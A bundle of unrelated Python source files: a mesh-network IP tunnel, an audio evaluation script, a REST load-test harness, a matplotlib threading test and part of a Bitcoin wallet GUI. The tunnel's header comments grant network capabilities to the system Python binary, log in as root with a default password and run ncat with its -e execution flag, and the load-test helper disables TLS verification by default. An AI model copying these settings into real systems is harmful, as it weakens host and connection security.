# status = "SUCCESS"
# preds = []
# for f in req_data['audio']:
# audio_uri, audio_bytes = f.get('audioUri',None),f.get('audioContent',None)
# la = req_data['config']['language']['sourceLanguage']
# af = req_data['config']['audioFormat']
# if audio_uri in [None,''] and audio_bytes in [None,'']:
# status = 'ERROR'
# continue
# try:
# if audio_bytes == None:
# fp_arr = load_data(audio_uri,of='url',lang=la)
# else:
# nm = str(round(time.time() * 1000))
# fp_arr = load_data(audio_bytes,of='bytes',lang=la,bytes_name=nm+"."+af)
# except:
# status = 'ERROR'
# continue
#
# op = "WEBVTT\n\n"
# for e,frame in enumerate(range(0,len(fp_arr),5)):
# op += str(e+1) + '\n'
# op += "{0}.000 --> {1}.000".format(time.strftime('%H:%M:%S', time.gmtime(frame)),time.strftime('%H:%M:%S', time.gmtime(frame+5)))+'\n'
# try:
# op+= align(fp_arr[frame*16000:int((frame+5.1)*16000)],cuda) +'\n'
# #print(align(fp_arr[frame*16000:int((frame+5.1)*16000)],cuda))
# except:
# op += ''
# break
# op += '\n'
# preds.append({'source':op})
# print(op)
# with open('placeholder.vtt', 'w') as f:
# f.write(op)
# captions = webvtt.read('placeholder.vtt')
# source_sentences = [caption.text.replace('\r', '').replace('\n', ' ') for caption in captions]
#
# sent = ' '.join(source_sentences)
# sent = sent.lower()
# punctuated = punct_model.punctuate(sent)
# # tokenised = sent_tokenize(punctuated)
#
# words = punctuated.split(' ')
#
# len_marker = 0
# for i in range(len(captions)):
# curr = len(captions[i].text.split(' '))
# captions[i].text = ' '.join(words[len_marker: len_marker+curr])
#
# len_marker += curr
# # return captions.content
# captions.save('normalised.vtt')
#
# with open('normalised.vtt', 'r') as f:
# content = f.read()
#
# preds.append({'source':content})
# return jsonify({"status":status, "output":preds})
|
tunnel.py
|
# code for IP tunnel over a mesh
# Note python-pytuntap was too buggy
# using pip3 install pytap2
# make sure to "sudo setcap cap_net_admin+eip /usr/bin/python3.8" so python can access tun device without being root
# sudo ip tuntap del mode tun tun0
# sudo bin/run.sh --port /dev/ttyUSB0 --setch-shortfast
# sudo bin/run.sh --port /dev/ttyUSB0 --tunnel --debug
# ssh -Y root@192.168.10.151 (or dietpi), default password p
# ncat -e /bin/cat -k -u -l 1235
# ncat -u 10.115.64.152 1235
# ping -c 1 -W 20 10.115.64.152
# ping -i 30 -W 30 10.115.64.152
# FIXME: use a more optimal MTU
from . import portnums_pb2
from pubsub import pub
import logging, threading
# A new non standard log level that is lower level than DEBUG
LOG_TRACE = 5
# fixme - find a way to move onTunnelReceive inside of the class
tunnelInstance = None
"""A list of chatty UDP services we should never accidentally
forward to our slow network"""
udpBlacklist = {
1900, # SSDP
5353, # multicast DNS
}
"""A list of TCP services to block"""
tcpBlacklist = {}
"""A list of protocols we ignore"""
protocolBlacklist = {
0x02, # IGMP
0x80, # Service-Specific Connection-Oriented Protocol in a Multilink and Connectionless Environment
}
def hexstr(barray):
"""Print a string of hex digits"""
return ":".join('{:02x}'.format(x) for x in barray)
def ipstr(barray):
"""Print a string of ip digits"""
return ".".join('{}'.format(x) for x in barray)
def readnet_u16(p, offset):
"""Read big endian u16 (network byte order)"""
return p[offset] * 256 + p[offset + 1]
def onTunnelReceive(packet, interface):
"""Callback for received tunneled messages from mesh
FIXME figure out how to do closures with methods in python"""
tunnelInstance.onReceive(packet)
class Tunnel:
"""A TUN based IP tunnel over meshtastic"""
def __init__(self, iface, subnet=None, netmask="255.255.0.0"):
"""
Constructor
iface is the already open MeshInterface instance
subnet is used to construct our network number (normally 10.115.x.x)
"""
if subnet is None:
subnet = "10.115"
self.iface = iface
self.subnetPrefix = subnet
global tunnelInstance
tunnelInstance = self
logging.info("Starting IP to mesh tunnel (you must be root for this *pre-alpha* feature to work). Mesh members:")
pub.subscribe(onTunnelReceive, "meshtastic.receive.data.IP_TUNNEL_APP")
myAddr = self._nodeNumToIp(self.iface.myInfo.my_node_num)
for node in self.iface.nodes.values():
nodeId = node["user"]["id"]
ip = self._nodeNumToIp(node["num"])
logging.info(f"Node { nodeId } has IP address { ip }")
logging.debug("creating TUN device with MTU=200")
# FIXME - figure out real max MTU, it should be 240 - the overhead bytes for SubPacket and Data
from pytap2 import TapDevice
self.tun = TapDevice(name="mesh")
self.tun.up()
self.tun.ifconfig(address=myAddr,netmask=netmask,mtu=200)
logging.debug(f"starting TUN reader, our IP address is {myAddr}")
self._rxThread = threading.Thread(target=self.__tunReader, args=(), daemon=True)
self._rxThread.start()
def onReceive(self, packet):
p = packet["decoded"]["data"]["payload"]
if packet["from"] == self.iface.myInfo.my_node_num:
logging.debug("Ignoring message we sent")
else:
logging.debug(f"Received mesh tunnel message type={type(p)} len={len(p)}")
# we don't really need to check for filtering here (sender should have checked), but this provides
# useful debug printing on types of packets received
if not self._shouldFilterPacket(p):
self.tun.write(p)
def _shouldFilterPacket(self, p):
"""Given a packet, decode it and return true if it should be ignored"""
protocol = p[8 + 1]
srcaddr = p[12:16]
destAddr = p[16:20]
subheader = 20
ignore = False # Assume we will be forwarding the packet
if protocol in protocolBlacklist:
ignore = True
logging.log(LOG_TRACE, f"Ignoring blacklisted protocol 0x{protocol:02x}")
elif protocol == 0x01: # ICMP
icmpType = p[20]
icmpCode = p[21]
checksum = p[22:24]
logging.debug(f"forwarding ICMP message src={ipstr(srcaddr)}, dest={ipstr(destAddr)}, type={icmpType}, code={icmpCode}, checksum={checksum}")
# reply to pings (swap src and dest but keep rest of packet unchanged)
#pingback = p[:12]+p[16:20]+p[12:16]+p[20:]
#tap.write(pingback)
elif protocol == 0x11: # UDP
srcport = readnet_u16(p, subheader)
destport = readnet_u16(p, subheader + 2)
if destport in udpBlacklist:
ignore = True
logging.log(LOG_TRACE, f"ignoring blacklisted UDP port {destport}")
else:
logging.debug(f"forwarding udp srcport={srcport}, destport={destport}")
elif protocol == 0x06: # TCP
srcport = readnet_u16(p, subheader)
destport = readnet_u16(p, subheader + 2)
if destport in tcpBlacklist:
ignore = True
logging.log(LOG_TRACE, f"ignoring blacklisted TCP port {destport}")
else:
logging.debug(f"forwarding tcp srcport={srcport}, destport={destport}")
else:
logging.warning(f"forwarding unexpected protocol 0x{protocol:02x}, src={ipstr(srcaddr)}, dest={ipstr(destAddr)}")
return ignore
def __tunReader(self):
tap = self.tun
logging.debug("TUN reader running")
while True:
p = tap.read()
#logging.debug(f"IP packet received on TUN interface, type={type(p)}")
destAddr = p[16:20]
if not self._shouldFilterPacket(p):
self.sendPacket(destAddr, p)
def _ipToNodeId(self, ipAddr):
# We only consider the last 16 bits of the nodenum for IP address matching
ipBits = ipAddr[2] * 256 + ipAddr[3]
if ipBits == 0xffff:
return "^all"
for node in self.iface.nodes.values():
nodeNum = node["num"] & 0xffff
# logging.debug(f"Considering nodenum 0x{nodeNum:x} for ipBits 0x{ipBits:x}")
if (nodeNum) == ipBits:
return node["user"]["id"]
return None
def _nodeNumToIp(self, nodeNum):
return f"{self.subnetPrefix}.{(nodeNum >> 8) & 0xff}.{nodeNum & 0xff}"
def sendPacket(self, destAddr, p):
"""Forward the provided IP packet into the mesh"""
nodeId = self._ipToNodeId(destAddr)
if nodeId is not None:
logging.debug(f"Forwarding packet bytelen={len(p)} dest={ipstr(destAddr)}, destNode={nodeId}")
self.iface.sendData(p, nodeId, portnums_pb2.IP_TUNNEL_APP, wantAck = False)
else:
logging.warning(f"Dropping packet because no node found for destIP={ipstr(destAddr)}")
def close(self):
self.tun.close()
|
threading_test.py
|
#! /usr/bin/python
"""
Test by Karen Tracey for threading problem reported in
http://www.mail-archive.com/matplotlib-devel@lists.sourceforge.net/msg04819.html
and solved by JDH in git commit 175e3ec5bed9144.
"""
from __future__ import print_function
import os
import threading
import traceback
import numpy as np
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure
thread_count = 8
max_iterations = 50
exception_raised = False
def png_thread(tn):
png_fname = 'out%d.png' % tn
vals = 100 + 15 * np.random.randn(10000)
i = 0
excp = None
global exception_raised
while not exception_raised and i < max_iterations:
i += 1
png_f = open(png_fname, 'wb')
try:
fig = Figure()
ax = fig.add_subplot(111)
ax.hist(vals, 50)
FigureCanvas(fig).print_png(png_f)
except Exception as excp:
pass
png_f.close()
if excp:
print('png_thread %d failed on iteration %d:' % (tn, i))
print(traceback.format_exc(excp))
exception_raised = True
else:
print('png_thread %d completed iteration %d.' % (tn, i))
os.unlink(png_fname)
def main(tc):
threads = []
for i in range(tc):
threads.append(threading.Thread(target=png_thread, args=(i + 1,)))
for t in threads:
t.start()
for t in threads:
t.join()
if not exception_raised:
msg = 'Success! %d threads completed %d iterations with no exceptions raised.'
else:
msg = 'Failed! Exception raised before %d threads completed %d iterations.'
print(msg % (tc, max_iterations))
if __name__ == "__main__":
main(thread_count)
|
eval.py
|
import sys
import os
sys.path.append(os.getcwd())
import threading
import time
import glob
import numpy as np
from utils.file_io import *
from argparse import ArgumentParser
import speechmetrics as sm
MAX_THREAD = 3
root = os.getcwd()
MUSDB_TEST = "data/musdb18hq/test"
def sdr(references, estimates):
# compute SDR for one song
delta = 1e-7 # avoid numerical errors
num = np.sum(np.square(references), axis=(1, 2))
den = np.sum(np.square(references - estimates), axis=(1, 2))
num += delta
den += delta
return 10 * np.log10(num / den)
metrics_bsseval = sm.load(["bsseval"], window=1) # [samples, channels]
metrics_sisdr = sm.load(["sisdr"], window=np.inf) # [samples, channels]
parser = ArgumentParser()
parser.add_argument('--step', type=str, default="", help="A fold contain a validation step results")
parser.add_argument('--path', type=str, default="", help="A fold contain all validation step results (step's super dir)")
parser.add_argument('--type', type=str, default="", help="Evaluation data type")
args = parser.parse_args()
type = args.type
if(len(args.step) == 0 and len(args.path) == 0):
raise RuntimeError("step argument and path argument at least should have one non-empty.")
# def unify_energy(est, target):
# max_est, max_target = np.max(np.abs(est)), np.max(np.abs(target))
# ratio = max_est/max_target
# return est/ratio, target
def evaluate_file(target, est, step_dir, fname):
"""
:param target: target .wav file absolute path
:param est: est .wav file absolute path
:param step_dir: path to validation step resuts, absolute path
:param fname: file name to evaluate, not path
:return:
"""
if(not os.path.exists(os.path.join(step_dir, fname, type + ".pkl"))):
target = read_wave(target, sample_rate=44100)
est = read_wave(est, sample_rate=44100)
est, target = est.astype(np.float32), target.astype(np.float32)
eval_bsseval = metrics_bsseval(est, target,rate=44100)
eval_sisdr = metrics_sisdr(est, target, rate=44100)
eval_sdr = sdr(target[None,...],est[None,...])
for k in eval_sisdr.keys():
eval_bsseval[k] = eval_sisdr[k]
eval_bsseval['sdr_ismir'] = eval_sdr
save_pickle(eval_bsseval, os.path.join(step_dir, fname, type + ".pkl"))
else:
eval_bsseval = load_pickle(os.path.join(step_dir, fname, type + ".pkl"))
print(os.getpid(),fname," - Score: ", [(each, np.nanmedian(eval_bsseval[each])) for each in eval_bsseval.keys()])
return eval_bsseval
def evaluate_step(step_dir, files:list):
"""
:param step_dir: path to validation step resuts, absolute path
:param files: list of file names
:return:
"""
t = threading.current_thread()
for file in files:
try:
evaluate_file(os.path.join(root,MUSDB_TEST,file,type+".wav"), os.path.join(step_dir, file, type+".wav"), step_dir, file)
except Exception as e:
pass
# print(os.path.join(step_dir, file, type+".wav"),"not found, skip this file.")
def evaluate_step_multiprocess(step_dir):
"""
:param step_dir: path to validation step resuts, absolute path
:return:
"""
files = os.listdir(os.path.join(root, MUSDB_TEST))
todos = divide_list(files, MAX_THREAD)
threads = []
for each in todos:
threads.append(threading.Thread(target=evaluate_step, args=(step_dir, each)))
for t in threads:
print("Start: ", t.ident, t.getName())
t.setDaemon(True)
t.start()
while True:
time.sleep(0.2)
status = []
for each in threads:
status.append(each.is_alive())
if (True in status):
continue
else:
print("Done!")
break
print("Start aggregating scores...")
aggregate_thread_results(step_dir=step_dir)
def aggregate_thread_results(step_dir):
eval = []
for fname in glob.glob(os.path.join(step_dir,"*/"+type+".pkl")):
bsseval = load_pickle(os.path.join(step_dir,fname))
eval.append(bsseval)
aggregate = aggregate_score(eval)
print(aggregate)
write_json(aggregate, os.path.join(step_dir, "evaluation_result_"+type+".json"))
print("Done")
def aggregate_score(outputs):
"""
[{ # first test element (from test dataloader) result
"<metrics>": <value>
}]
"""
# Calculate metrics
res, metrics = {}, []
for element in outputs: # each validation sample
if (len(metrics) == 0): # collect all_mel_e2e metrics ( from the output of validation step )
for k in element.keys(): metrics.append(k)
for m in metrics: # calculate median for a song
element[m] = np.nanmedian(element[m])
for m in metrics:
res[m] = float(np.median([x[m] for x in outputs]))
return res
def evaluate_path(path):
files = os.listdir(os.path.join(root, MUSDB_TEST))
for step in os.listdir(path):
step_dir = os.path.join(path,step)
print("EVALUATE PATH: ",step_dir)
if(os.path.isdir(step_dir)):
evaluate_step_multiprocess(step_dir)
def divide_list(li,thread_num):
range_ = np.linspace(0,len(li),thread_num+1)
res = []
start,end = None,None
for each in range(range_.shape[0]):
if(each + 1 == range_.shape[0]):
break
start,end = int(range_[each]),int(range_[each+1])
res.append(li[start:end])
return res
if __name__ == "__main__":
if(len(args.step) != 0):
evaluate_step_multiprocess(args.step)
if(len(args.path) != 0):
evaluate_path(path=args.path)
|
perf_test_rest_api.py
|
"""
Description:
Scale up REST API functional tests to performance tests using threading.
Note:
requests module is synchronous and does not support asyncio to await for responses.
Another option is to use aiohttp module, which uses asyncio for asynchrony. This option requires re-writing
the API test functions, though they are quite like requests functions, and measuring the response time
is not straight forward as requests and the response time may not be accurate for the nature of asyncio.
Features:
Python version: 3.7 or above
Install:
pip install -U requests
Run:
"""
from time import sleep
import time
from datetime import datetime
import logging
from logging.handlers import RotatingFileHandler
import requests
import json
import os
import pdb
import ast
import inspect
import random
# import asyncio
import sys
import threading
from threading import Thread, Event, Timer
import queue
if sys.version_info < (3,7):
raise Exception("Requires Python 3.7 or above.")
# Change log level to error to improve client performance.
LOG_LEVEL = logging.DEBUG # DEBUG, INFO, WARNING, ERROR, CRITICAL
# Assume project structure as below:
# Scripts - python scripts
# Logs - logs
# run.bat - batch script to run
# root_path is parent folder of Scripts folder (one level up)
root_path = os.path.dirname( os.path.dirname(os.path.realpath(__file__)) )
# %(levelname)7s to align 7 bytes to right, %(levelname)-7s to left.
# common_formatter = logging.Formatter('%(asctime)s [%(levelname)-7s][ln-%(lineno)-3d]: %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
common_formatter = logging.Formatter('%(asctime)s [%(levelname)-7s][ln-%(lineno)-3d]: %(message)s')
# Note: To create multiple log files, must use different logger name.
def setup_logger(log_file, level=logging.INFO, name='', formatter=common_formatter):
"""Function setup as many loggers as you want."""
handler = logging.FileHandler(log_file,mode='w') # default mode is append
# Or use a rotating file handler
# handler = RotatingFileHandler(log_file,maxBytes=1024, backupCount=5)
handler.setFormatter(formatter)
logger = logging.getLogger(name)
logger.setLevel(level)
logger.addHandler(handler)
return logger
# default debug logger
debug_log_filename = root_path + os.sep + 'Logs' + os.sep + 'debug.log'
log = setup_logger(debug_log_filename, LOG_LEVEL,'log')
# logger for API outputs
# api_formatter = logging.Formatter('%(asctime)s: %(message)s', datefmt='%Y-%m-%d %I:%M:%S')
api_formatter = logging.Formatter('%(asctime)s: %(message)s')
api_outputs_filename = root_path + os.sep + 'Logs' + os.sep + 'api_outputs.log'
log_api = setup_logger(api_outputs_filename, LOG_LEVEL,'log_api',formatter = api_formatter)
# pretty print Restful request to API log
# argument is request object
def pretty_print_request(request):
"""
Pay attention at the formatting used in this function because it is programmed to be pretty printed and may differ from the actual request.
"""
log_api.info('{}\n{}\n\n{}\n\n{}\n'.format(
'-----------Request----------->',
request.method + ' ' + request.url,
'\n'.join('{}: {}'.format(k, v) for k, v in request.headers.items()),
request.body)
)
# pretty print Restful request to API log
# argument is response object
def pretty_print_response(response):
log_api.info('{}\n{}\n\n{}\n\n{}\n'.format(
'<-----------Response-----------',
'Status code:' + str(response.status_code),
'\n'.join('{}: {}'.format(k, v) for k, v in response.headers.items()),
response.text
))
# argument is request object
# display body in json format explicitly with expected indent. Actually most of the time it is not very necessary because body is formatted in pretty print way.
def pretty_print_request_json(request):
log_api.info('{}\n{}\n\n{}\n\n{}\n'.format(
'-----------Request----------->',
request.method + ' ' + request.url,
'\n'.join('{}: {}'.format(k, v) for k, v in request.headers.items()),
json.dumps(ast.literal_eval(request.body),indent=4))
)
# argument is response object
# display body in json format explicitly with expected indent. Actually most of the time it is not very necessary because body is formatted in pretty print way.
def pretty_print_response_json(response):
log_api.info('{}\n{}\n\n{}\n\n{}\n'.format(
'<-----------Response-----------',
'Status code:' + str(response.status_code),
'\n'.join('{}: {}'.format(k, v) for k, v in response.headers.items()),
json.dumps(response.json(),indent=4)
))
class TestAPI:
"""
Performance Test Restful HTTP API examples.
"""
def __init__(self):
log.debug('To load test data.')
self.queue_results = queue.Queue()
# test start and end time
self.start_time = 0
self.end_time = 0
# request per second
# self.rps_min = 0
self.rps_mean = 0
# self.rps_max = 0
self.total_tested_requests = 0
self.total_tested_time = 0
self.total_pass_requests = 0
# time per request
self.tpr_min = 999
self.tpr_mean = 0
self.tpr_max = 0
self.sum_response_time = 0
# failures
self.total_fail_requests = 0
self.total_exception_requests = 0
# event flag to set and check test time is up.
self.event_time_up = Event()
# event flag to indicate test is done, either normally or by interruption
self.event_test_done = Event()
self.timer = None
# post with headers, json body
def test_post_headers_body_json(self):
payload = {'key1': 1, 'key2': 'value2'}
# No need to specify common headers as it is taken cared of by common self.post() function.
# headers = {'Content-Type': 'application/json' }
# convert dict to json by json.dumps() for body data. It is risky to use str(payload) to convert because json format must use double quotes ("")
url = 'https://httpbin.org/post'
resp = self.post(url, data = json.dumps(payload,indent=4))
# assert resp != None
if resp == None:
log.error('Test %s failed with exception.' % inspect.stack()[0][3] )
return 'exception', None
elif resp.status_code != 200:
log.error('Test %s failed with response status code %s.' % (inpsect.stack()[0][3],resp.status_code) )
return 'fail', resp.elapsed.total_seconds()
elif resp.json()["url"] != url:
log.error('Test %s failed with url %s != %s.' % (inspect.stack()[0][3], resp.json()["url"], url) )
return 'fail', resp.elapsed.total_seconds()
else:
log.info('Test %s passed.' % inspect.stack()[0][3])
return 'pass', resp.elapsed.total_seconds()
""" Request HTTP body:
{ "key1": 1,
"key2": "value2"
}
"""
# To run this test using Flask mocking service,
# start mock service first: python flask_mock_service.py
# Then run the tests.
def test_mock_service(self):
log.info('Calling %s.' % inspect.stack()[0][3])
url = r'http://127.0.0.1:5000/json'
resp = self.get(url)
# Convert assert for functional tests to validate for performance tests so it won't stop on a test failure.
# assert resp != None
# assert resp.json()["code"] == 1
if resp == None:
log.error('Test %s failed with exception.' % inspect.stack()[0][3] )
return 'exception', None
elif resp.status_code != 200:
log.error('Test %s failed with response status code %s.' % (inpsect.stack()[0][3],resp.status_code) )
return 'fail', resp.elapsed.total_seconds()
elif resp.json()["code"] != 1:
log.error('Test %s failed with code %s != 1.' % (inspect.stack()[0][3], resp.json()["code"]) )
return 'fail', resp.elapsed.total_seconds()
else:
log.info('Test %s passed.' % inspect.stack()[0][3])
return 'pass', resp.elapsed.total_seconds()
""" json response
{
"code": 1,
"message": "Hello, World!"
}
"""
def loop_test(self, loop_wait=0, loop_times=sys.maxsize):
"""
loop test of some APIs for performance test purpose.
Parameters:
loop_wait wait time between two loops.
loop_times number of loops, default indefinite
"""
looped_times = 0
while (looped_times < loop_times
and not self.event_time_up.is_set()
and not self.event_test_done.is_set()):
# APIs to test
# API - test_mock_service:
test_result, elapsed_time = self.test_mock_service()
# put results into a queue for statistics
self.queue_results.put(['test_mock_service', test_result, elapsed_time])
# # API - test_post_headers_body_json:
# test_result, elapsed_time = self.test_post_headers_body_json()
# self.queue_results.put(['test_post_headers_body_json', test_result, elapsed_time])
looped_times += 1
sleep(loop_wait)
def stats(self):
""" calculate statistics """
end_time = time.time()
# get the approximate queue size
qsize = self.queue_results.qsize()
loop = 0
for i in range(qsize):
try:
result=self.queue_results.get_nowait()
loop +=1
except Empty:
break
# calc stats
if result[1] == 'exception':
self.total_exception_requests += 1
elif result[1] == 'fail':
self.total_fail_requests += 1
elif result[1] == 'pass':
self.total_pass_requests += 1
self.sum_response_time += result[2]
if result[2] < self.tpr_min:
self.tpr_min = result[2]
if result[2] > self.tpr_max:
self.tpr_max = result[2]
self.total_tested_requests += loop
# time per requests mean (avg)
if self.total_pass_requests != 0:
self.tpr_mean = self.sum_response_time / self.total_pass_requests
# requests per second
if self.start_time == 0:
log.error('stats: self.start_time is not set, skipping rps stats.')
else:
# calc the tested time so far.
tested_time = end_time - self.start_time
self.rps_mean = self.total_pass_requests / tested_time
# print stats
print('\n-----------------Test Statistics---------------')
print(time.asctime())
print('Total requests: %s, pass: %s, fail: %s, exception: %s'
% (self.total_tested_requests, self.total_pass_requests, self.total_fail_requests, self.total_exception_requests)
)
if self.total_pass_requests > 0:
print('For pass requests:')
print('Request per Second - mean: %.2f' % self.rps_mean)
print('Time per Request - mean: %.6f, min: %.6f, max: %.6f'
% (self.tpr_mean, self.tpr_min, self.tpr_max)
)
# print('\n')
def loop_stats(self, interval=60):
""" print stats in an interval(secs) continunously
Run this as a separate thread so it won't block the main thread.
"""
# while True:
while (not self.event_time_up.is_set()
and not self.event_test_done.is_set()):
sleep(interval)
self.stats()
def set_event_time_up(self):
""" set the time up flag """
if not self.event_time_up.is_set():
self.event_time_up.set()
self.event_test_done.set()
def set_event_test_done(self):
""" set the test done flag either normally or by interruption """
if not self.event_test_done.is_set():
self.event_test_done.set()
def start_timer(self, timeout):
""" set a timer to stop testing """
self.timer = Timer(timeout, self.set_event_time_up)
self.timer.start()
def cancel_timer(self):
""" cancel the timer if test loop_times is reached first. """
if self.timer != None and not self.event_time_up.is_set():
self.timer.cancel()
def post(self, url, data,headers={}, verify=True, amend_headers=True):
"""
common request post function with below features, which you only need to take care of url and body data:
- append common headers
- print request and response in API log file
- Take care of request exception and non-200 response codes and return None, so you only need to care normal json response.
- arguments are the same as requests.post, except amend_headers.
verify: False - Disable SSL certificate verification
Return: None for exception
"""
# append common headers if none
headers_new = headers
if amend_headers == True:
if 'Content-Type' not in headers_new:
headers_new['Content-Type']=r'application/json'
if 'User-Agent' not in headers_new:
headers_new['User-Agent']='Python Requests'
# send post request
try:
resp = requests.post(url, data = data, headers = headers_new, verify = verify)
except Exception as ex:
log.error('requests.post() failed with exception:', str(ex))
return None
# pretty request and response into API log file
# Note: request print is common instead of checking if it is JSON body. So pass pretty formatted json string as argument to the request for pretty logging.
pretty_print_request(resp.request)
pretty_print_response_json(resp)
log_api.debug('response time in seconds: ' + str(resp.elapsed.total_seconds()) + '\n')
# This return caller function's name, not this function post.
# caller_func_name = inspect.stack()[1][3]
# if resp.status_code != 200:
# log.error('%s failed with response code %s.' %(caller_func_name,resp.status_code))
# return None
# return resp.json()
return resp
def get(self, url, auth=None, verify=False):
"""
common request get function with below features, which you only need to take care of url:
- print request and response in API log file
- Take care of request exception and non-200 response codes and return None, so you only need to care normal json response.
- arguments are the same as requests.get
verify: False - Disable SSL certificate verification
Return: None for exception
"""
try:
if auth == None:
resp = requests.get(url, verify = verify)
else:
resp = requests.get(url, auth = auth, verify = verify)
except Exception as ex:
log.error('requests.get() failed with exception:', str(ex))
return None
# pretty request and response into API log file
pretty_print_request(resp.request)
pretty_print_response_json(resp)
log_api.debug('response time in seconds: ' + str(resp.elapsed.total_seconds()) + '\n' )
# This return caller function's name, not this function post.
# caller_func_name = inspect.stack()[1][3]
# if resp.status_code != 200:
# log.error('%s failed with response code %s.' %(caller_func_name,resp.status_code))
# return None
# return resp.json()
return resp
def main():
### Test Settings ###
concurrent_users = 10
# test stops whenever loop_times or test_time is met first.
loop_times = 30
test_time = 3600 # time in seconds, e.g. 36000
stats_interval = 2
ramp_up = 0 # total time in secs to ramp up. default 0, no wait
perf_test = TestAPI()
workers = []
start_time = time.time()
perf_test.start_time = start_time
print('Tests started at %s.' % time.asctime())
# start stats thread
stats_thread = Thread(target=perf_test.loop_stats, args=[stats_interval], daemon=True)
stats_thread.start()
# start concurrent user threads
for i in range(concurrent_users):
thread = Thread(target=perf_test.loop_test, kwargs={'loop_times': loop_times}, daemon=True)
thread.start()
workers.append(thread)
# ramp up wait
sleep(ramp_up / concurrent_users)
# start timer
perf_test.start_timer(test_time)
# Block until all threads finish.
for w in workers:
w.join()
# clean up
# stop timer if loop_times is reached first.
perf_test.cancel_timer()
end_time = time.time()
perf_test.end_time = end_time
# Ensure to execute the last statistics:
perf_test.stats()
print('\nTests ended at %s.\nTotal test time: %s seconds.' % (time.asctime(), end_time - start_time) )
if __name__ == '__main__':
main()
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrum
from electrum.bitcoin import TYPE_ADDRESS
from electrum import WalletStorage, Wallet
from electrum_gui.kivy.i18n import _
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword
from electrum.plugins import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import base_units
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum.bitcoin import NetworkConstants
pp = servers.get(host, NetworkConstants.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == self.network.get_blockchain_name(b):
self.network.follow_chain(index)
#self.block
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) >1:
ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'mBTC')
def _set_bu(self, value):
assert value in base_units.keys()
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
